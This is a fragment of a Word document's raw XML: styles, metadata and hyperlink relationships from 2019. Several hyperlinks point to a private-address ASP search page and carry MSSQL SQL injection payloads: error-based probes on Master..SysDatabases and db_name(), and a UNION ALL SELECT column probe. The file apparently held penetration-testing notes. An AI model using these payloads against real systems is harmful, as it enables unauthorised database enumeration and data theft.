    <w:rsid w:val="00BD76B3"/>
    <w:rsid w:val="00ED055C"/>
    <w:rsid w:val="00FD5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1747A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0FE70E8C-9D55-4084-ABD4-89E77F4F9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878E1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878E1"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a5">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003878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878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://172.16.1.121/search.asp?key=123%27%20and%20(SELECT%20top%201%20Name%20FROM%20Master..SysDatabases)%3E0--+-Tbeu&amp;otype=title&amp;submit2=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172.16.1.121/search.asp?key=123%27+UNION+ALL+SELECT+null,%27kkkkkkk%27,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--+-Tbeu&amp;otype=title&amp;submit2=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hyperlink" Target="http://172.16.1.121/search.asp?key=123%27%20and%20db_name()%3E0--+-Tbeu&amp;otype=title&amp;submit2=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358</Words>
  <Characters>2042</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>17</Lines>
  <Paragraphs>4</Paragraphs>
  <ScaleCrop>false</ScaleCrop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@!123</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>@!123</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-03-18T11:45:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-03-18T11:45:00Z</dcterms:modified>
</cp:coreProperties>
</file>